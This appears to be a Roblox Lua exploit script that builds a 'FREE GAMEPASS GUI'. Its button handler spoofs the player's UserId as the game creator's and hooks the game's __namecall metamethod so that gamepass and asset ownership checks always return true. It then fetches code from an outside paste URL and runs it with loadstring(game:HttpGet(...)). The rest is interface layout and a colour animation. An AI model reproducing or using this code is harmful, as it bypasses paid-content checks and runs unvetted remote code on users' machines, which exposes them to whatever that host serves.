local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local TextButton = Instance.new("TextButton")
local TextButton_Roundify_12px = Instance.new("ImageLabel")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextButton_2 = Instance.new("TextButton")

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.new(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.380307138, 0, 0.356790125, 0)
Frame.Size = UDim2.new(0, 264, 0, 232)

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.new(0.392157, 0.392157, 0.392157)
TextButton.BackgroundTransparency = 1
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.075757578, 0, 0.238093197, 0)
TextButton.Size = UDim2.new(0, 223, 0, 61)
TextButton.ZIndex = 10
TextButton.Font = Enum.Font.SourceSansBold
TextButton.Text = "Click to get free gamepasses!"
TextButton.TextColor3 = Color3.new(1, 0, 0.0156863)
TextButton.TextScaled = true
TextButton.TextSize = 14
TextButton.TextWrapped = true

TextButton_Roundify_12px.Name = "TextButton_Roundify_12px"
TextButton_Roundify_12px.Parent = TextButton
TextButton_Roundify_12px.Active = true
TextButton_Roundify_12px.AnchorPoint = Vector2.new(0.5, 0.5)
TextButton_Roundify_12px.BackgroundColor3 = Color3.new(1, 1, 1)
TextButton_Roundify_12px.BackgroundTransparency = 1
TextButton_Roundify_12px.Position = UDim2.new(0.493303567, 0, 0.5, 0)
TextButton_Roundify_12px.Selectable = true
TextButton_Roundify_12px.Size = UDim2.new(1.07589281, 0, 0.99999994, 0)
TextButton_Roundify_12px.ZIndex = 2
TextButton_Roundify_12px.Image = "rbxassetid://3570695787"
TextButton_Roundify_12px.ImageColor3 = Color3.new(0.886275, 0.886275, 0.886275)
TextButton_Roundify_12px.ScaleType = Enum.ScaleType.Slice
TextButton_Roundify_12px.SliceCenter = Rect.new(100, 100, 100, 100)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel.BackgroundTransparency = 1
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.0265151523, 0, 0.5661062, 0)
TextLabel.Size = UDim2.new(0, 249, 0, 63)
TextLabel.ZIndex = 5
TextLabel.Font = Enum.Font.Arcade
TextLabel.Text = "Made by Verlox  : Verlox devlopers "
TextLabel.TextColor3 = Color3.new(1, 1, 1)
TextLabel.TextScaled = true
TextLabel.TextSize = 14
TextLabel.TextWrapped = true

TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.new(1, 1, 1)
TextLabel_2.BackgroundTransparency = 1
TextLabel_2.BorderSizePixel = 0
TextLabel_2.Position = UDim2.new(7.4505806e-09, 0, -0.0344827585, 0)
TextLabel_2.Size = UDim2.new(0, 264, 0, 63)
TextLabel_2.ZIndex = 6
TextLabel_2.Font = Enum.Font.Creepster
TextLabel_2.Text = "FREE GAMEPASS GUI"
TextLabel_2.TextColor3 = Color3.new(1, 1, 1)
TextLabel_2.TextScaled = true
TextLabel_2.TextSize = 14
TextLabel_2.TextWrapped = true

TextButton_2.Parent = Frame
TextButton_2.BackgroundColor3 = Color3.new(1, 1, 1)
TextButton_2.BorderSizePixel = 0
TextButton_2.Position = UDim2.new(0.223484844, 0, 0.887931049, 0)
TextButton_2.Size = UDim2.new(0, 146, 0, 26)
TextButton_2.Font = Enum.Font.SourceSans
TextButton_2.Text = "Destory gui"
TextButton_2.TextColor3 = Color3.new(0, 0, 0)
TextButton_2.TextScaled = true
TextButton_2.TextSize = 14
TextButton_2.TextWrapped = true

-- Scripts

local function GAVYODK_fake_script() -- TextButton.LocalScript 
	local script = Instance.new('LocalScript', TextButton)

	function onclick()
		print("yes!!")
		if game.CreatorType == Enum.CreatorType.User then
			game.Players.LocalPlayer.UserId = game.CreatorId
		end
		if game.CreatorType == Enum.CreatorType.Group then
			game.Players.LocalPlayer.UserId = game:GetService("GroupService"):GetGroupInfoAsync(game.CreatorId).Owner.Id
		end
		wait()
		local mt = getrawmetatable(game)
		local old = mt.__namecall
		setreadonly(mt, false)
		mt.__namecall = newcclosure(function(self, ...)
			local method = getnamecallmethod()
			if method == 'UserOwnsGamePassAsync' or method == 'PlayerHasPass' or method == 'PlayerOwnsAsset' then
				return true
			end
			return old(self, ...)
		end)
		setreadonly(mt, true)
		wait(0.5)
		game.Players.LocalPlayer.Character.Humanoid.Health = 0

		repeat wait() until game.Players.LocalPlayer.Character.Humanoid.Health ~= 0
		loadstring(game:HttpGet(('https://pastefy.ga/VYIAk3o1/raw'),true))()

		game.StarterGui:SetCore("SendNotification", {
			Title = "Verlox hub";
			Text = "Attempted to get free gamepasses and universal tools!";
			Icon = "rbxassetid://57254792"; 
			Duration = 5; 
		})
	end

	script.Parent.MouseButton1Click:connect(onclick)
end
coroutine.wrap(GAVYODK_fake_script)()
local function BYKIYL_fake_script() -- TextLabel_2.LocalScript 
	local script = Instance.new('Script', TextLabel_2)

	local text = script.Parent
	local add = 10
	wait(1)
	local k = 1
	while k <= 255 do
		text.TextColor3 = Color3.new(k/255,0/255,0/255)
		k = k + add
		wait()
	end
	while true do
		k = 1
		while k <= 255 do
			text.TextColor3 = Color3.new(255/255,k/255,0/255)
			k = k + add
			wait()
		end
		k = 1
		while k <= 255 do
			text.TextColor3 = Color3.new(255/255 - k/255,255/255,0/255)
			k = k + add
			wait()
		end
		k = 1
		while k <= 255 do
			text.TextColor3 = Color3.new(0/255,255/255,k/255)
			k = k + add
			wait()
		end
		k = 1
		while k <= 255 do
			text.TextColor3 = Color3.new(0/255,255/255 - k/255,255/255)
			k = k + add
			wait()
		end
		k = 1
		while k <= 255 do
			text.TextColor3 = Color3.new(k/255,0/255,255/255)
			k = k + add
			wait()
		end
		k = 1
		while k <= 255 do
			text.TextColor3 = Color3.new(255/255,0/255,255/255 - k/255)
			k = k + add
			wait()
		end
		while k <= 255 do
			text.TextColor3 = Color3.new(255/255 - k/255,0/255,0/255)
			k = k + add
			wait()
		end
	end
end
coroutine.wrap(BYKIYL_fake_script)()
local function SOIYI_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	script.Parent.Active = true
	script.Parent.Draggable = true
end
coroutine.wrap(SOIYI_fake_script)()
local function TCHPMMP_fake_script() -- TextButton_2.LocalScript 
	local script = Instance.new('LocalScript', TextButton_2)

	function onclick()
		script.Parent.Parent:Destroy()
	end


	script.Parent.MouseButton1Click:connect(onclick)
end
coroutine.wrap(TCHPMMP_fake_script)()
